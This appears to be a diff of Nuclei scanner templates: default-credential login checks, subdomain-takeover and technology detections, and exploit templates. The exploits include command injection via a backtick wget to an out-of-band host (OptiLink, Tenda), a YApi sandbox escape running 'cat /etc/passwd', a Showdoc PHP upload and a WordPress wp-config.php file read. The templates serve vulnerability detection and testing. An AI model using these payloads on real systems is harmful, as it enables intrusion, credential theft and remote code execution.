module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

67
default-logins/aem/adobe-aem-default-credentials.yaml Normal file
View File

@ -0,0 +1,67 @@
id: adobe-aem-default-credentials
info:
name: Adobe AEM Default Credentials
author: random-robbie
severity: critical
tags: aem,default-login
reference:
requests:
- payloads:
rr_username:
- admin
- grios
- replication-receiver
- vgnadmin
- aparker@geometrixx.info
- jdoe@geometrixx.info
- james.devore@spambob.com
- matt.monroe@mailinator.com
- aaron.mcdonald@mailinator.com
- jason.werner@dodgit.com
rr_password:
- admin
- password
- replication-receiver
- vgnadmin
- aparker
- jdoe
- password
- password
- password
- password
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
raw:
- |
POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: {{BaseURL}}
Referer: {{BaseURL}}/libs/granite/core/content/login.html
Connection: close
_charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- login-token
- crx.default
condition: and

31
default-logins/dell/dell-emc-ecom-default-credentials.yaml Normal file
View File

@ -0,0 +1,31 @@
id: dell-emc-ecom-default-credentials
info:
name: Dell EMC ECOM Default Credentials
author: Techryptic (@Tech)
severity: high
description: Default Credentials of admin:#1Password on Dell EMC ECOM application.
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
tags: dell,emc,ecom,default-login
requests:
- method: GET
path:
- '{{BaseURL}}'
headers:
Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
matchers-condition: and
matchers:
- type: word
words:
- "Set-Cookie: ECOMSecurity"
part: header
- type: word
words:
- "Welcome to ECOM"
- type: status
status:
- 200

31
default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml Normal file
View File

@ -0,0 +1,31 @@
id: hortonworks-smartsense-default-credentials
info:
name: HortonWorks SmartSense Default Credentials
author: Techryptic (@Tech)
severity: high
description: Default Credentials of admin:admin on HortonWorks SmartSense application.
reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
tags: hortonworks,smartsense,default-login
requests:
- method: GET
path:
- '{{BaseURL}}/apt/v1/context'
headers:
Authorization: Basic YWRtaW46YWRtaW4=
matchers-condition: and
matchers:
- type: word
words:
- "Set-Cookie: SUPPORTSESSIONID"
part: header
- type: word
words:
- "smartsenseId"
- type: status
status:
- 200

34
default-logins/idemia/idemia-biometrics-default-credentials.yaml Normal file
View File

@ -0,0 +1,34 @@
id: idemia-biometrics-default-credentials
info:
name: IDEMIA BIOMetrics Default Credentials
author: Techryptic (@Tech)
severity: high
description: Default Credentials of password=12345 on IDEMIA BIOMetrics application.
reference: https://www.google.com/search?q=idemia+password%3D+"12345"
tags: idemia,biometrics,default-login
requests:
- method: POST
path:
- '{{BaseURL}}/cgi-bin/login.cgi'
body: password=12345
matchers-condition: and
matchers:
- type: word
words:
- "session_id="
- "resource"
condition: and
- type: word
words:
- "Invalid Password"
part: body
negative: true
- type: status
status:
- 200

31
default-logins/paloalto/panos-default-credentials.yaml Normal file
View File

@ -0,0 +1,31 @@
id: panos-default-credentials
info:
name: Palo Alto Networks PAN-OS Default Credentials
author: Techryptic (@Tech)
severity: high
description: Default Credentials of admin:admin on Palo Alto Networks PAN-OS application.
reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
tags: paloalto,panos,default-login
requests:
- method: POST
path:
- '{{BaseURL}}/php/login.php'
body: user=admin&passwd=admin&challengePwd=&ok=Login
matchers-condition: and
matchers:
- type: word
words:
- "Set-Cookie: PHPSESSID"
part: header
- type: word
words:
- "Warning: Your device is still configured with the default admin"
- type: status
status:
- 200

28
default-logins/ricoh/ricoh-weak-password.yaml Normal file
View File

@ -0,0 +1,28 @@
id: ricoh-weak-password
info:
name: Ricoh Weak Password
author: gy741
severity: high
tags: ricoh,default-login
reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
requests:
- raw:
- |
POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1
Host: {{Hostname}}
Cookie: cookieOnOffChecker=on;
wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open=
matchers-condition: and
matchers:
- type: regex
regex:
- 'wimsesid=[0-9]+'
part: header
- type: status
status:
- 302

27
default-logins/visionhub/visionhub-default-credentials.yaml Normal file
View File

@ -0,0 +1,27 @@
id: visionhub-default-credentials
info:
name: VisionHub Default Credentials
author: Techryptic (@Tech)
severity: high
description: Default Credentials of admin:admin on VisionHub application.
tags: visionhub,default-login
reference: https://www.qognify.com/products/visionhub/
requests:
- method: POST
path:
- '{{BaseURL}}/VisionHubWebApi/api/Login'
headers:
Authorization: Basic YWRtaW46YWRtaW4=
matchers-condition: and
matchers:
- type: word
words:
- "Set-Cookie: admin"
part: header
- type: status
status:
- 200

3
takeovers/heroku-takeover.yaml
View File

@ -2,7 +2,7 @@ id: heroku-takeover
info:
name: heroku takeover detection
author: pdteam
author: 0xPrial,pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -15,7 +15,6 @@ requests:
matchers:
- type: word
words:
- "There's nothing here, yet."
- "herokucdn.com/error-pages/no-such-app.html"
- "<title>No such app</title>"
condition: and

6
takeovers/netlify-takeover.yaml
View File

@ -2,7 +2,7 @@ id: netlify-takeover
info:
name: netlify takeover detection
author: pdteam
author: 0xPrial,pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -16,9 +16,9 @@ requests:
matchers:
- type: word
words:
- "Not Found"
- "Not found - Request ID:"
- type: word
words:
- "server: Netlify"
- "Netlify"
part: header

26
technologies/aem-detection.yaml Normal file
View File

@ -0,0 +1,26 @@
id: aem-detection
info:
name: Favicon based AEM Detection
severity: info
author: shifacyclewala,hackergautam
tags: aem,favicon,tech
reference: |
- https://twitter.com/brsn76945860/status/1171233054951501824
- https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
requests:
- method: GET
path:
- "{{BaseURL}}/libs/granite/core/content/login/favicon.ico"
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"

24
technologies/node-red-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: node-red-detect
info:
name: Node RED Detect
author: pikpikcu
severity: info
tags: tech,apache
requests:
- method: GET
path:
- "{{BaseURL}}/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Node-RED</title>"
- type: status
status:
- 200

39
technologies/sap-igs-detect.yaml Normal file
View File

@ -0,0 +1,39 @@
id: sap-igs-detect
info:
name: SAP Internet Graphics Server (IGS) Detection
author: _generic_human_
description: Detection of SAP Internet Graphics Server (IGS)
severity: info
tags: sap,tech,igs
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SAP IGS"
- "is running"
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "SAP Internet Graphics Server"
extractors:
- type: kval
part: header
kval:
- "Server"

21
technologies/seeddms-detect.yaml Normal file
View File

@ -0,0 +1,21 @@
id: seeddms-detect
info:
name: Seeddms-
author: pussycat0x
severity: info
tags: tech
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- "<title>SeedDMS: Sign in</title>"
- type: status
status:
- 200

25
technologies/yapi-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: yapi-detect
info:
name: YApi Detect
author: pikpikcu
severity: info
tags: tech,yapi
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}:3000"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>YApi-高效、易用、功能强大的可视化接口管理平台</title>"
- type: status
status:
- 200

35
vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml Normal file
View File

@ -0,0 +1,35 @@
id: optilink-ont1gew-gpon-rce
info:
name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution
author: gy741
severity: critical
description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
reference: |
- https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
tags: optiLink,rce,oob
requests:
- raw:
- |
POST /boaform/admin/formTracert HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Origin: http://{{Hostname}}
Connection: keep-alive
Referer: http://{{Hostname}}/diag_ping_admin_en.asp
Upgrade-Insecure-Requests: 1
Host: {{Hostname}}
User: e8c
Password: e8c
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

18
vulnerabilities/other/showdoc-file-upload-rce.yaml
View File

@ -1,4 +1,5 @@
id: showdoc-file-upload-rce
info:
name: Showdoc < 2.8.6 File Upload RCE
author: pikpikcu
@ -20,7 +21,7 @@ requests:
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
<?php phpinfo();?>
<?php echo md5('rce_test');?>
----------------------------835846770881083140190633--
- |
@ -37,11 +38,12 @@ requests:
regex:
- '/Uploads\\(.*?)"\,"success"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_2, "PHP Extension")'
- 'contains(body_2, "PHP Version")'
- 'status_code_2 == 200'
condition: and
- type: word
words:
- '3c7cb9f46815a790686b857fdbc4295a'
- type: status
status:
- 200

110
vulnerabilities/other/yapi-rce.yaml Normal file
View File

@ -0,0 +1,110 @@
id: yapi-rce
info:
name: Yapi Remote Code Execution
author: pikpikcu
severity: critical
tags: yapi,rce
reference: |
- https://www.secpulse.com/archives/162502.html
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
- https://twitter.com/sec715/status/1415484190561161216
- https://github.com/YMFE/yapi
requests:
- raw:
- | # REQUEST 1
POST /api/user/reg HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 94
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"}
- | # REQUEST 2
GET /api/group/list HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/json, text/plain, */*
Accept-Encoding: gzip
- | # REQUEST 3
POST /api/project/add HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 106
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"}
- | # REQUEST 4
GET /api/project/get?id={{project_id}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
- | # REQUEST 5
POST /api/interface/add HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 89
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}}
- | # REQUEST 6
POST /api/plugin/advmock/save HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 382
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true}
- | # REQUEST 7
GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
cookie-reuse: true
extractors:
- type: regex
name: group_id
group: 1
internal: true
part: body
regex:
- '"_id":([0-9]+),"group_name"'
- type: regex
name: interface_id
group: 1
internal: true
part: body
regex:
- '"req_body_form":\[\],"_id":([0-9]+)'
- type: regex
name: project_id
group: 1
internal: true
part: body
regex:
- '"tag":\[\],"_id":([0-9]+)'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
- type: status
status:
- 200

30
vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml Normal file
View File

@ -0,0 +1,30 @@
id: wp-memphis-documents-library-lfi
info:
name: WordPress Plugin Memphis Document Library 3.1.5 LFI
author: 0x_Akoko
severity: high
tags: wordpress,wp-plugin,lfi
description: Arbitrary file download in Memphis Document Library 3.1.5
reference: |
- https://www.exploit-db.com/exploits/39593
- https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
requests:
- method: GET
path:
- '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php'
- '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200

4
workflows/aem-workflow.yaml
View File

@ -7,4 +7,6 @@ info:
tags: workflow
workflows:
- template: misconfiguration/aem/
- template: technologies/aem-detection.yaml
subtemplates:
- tags: aem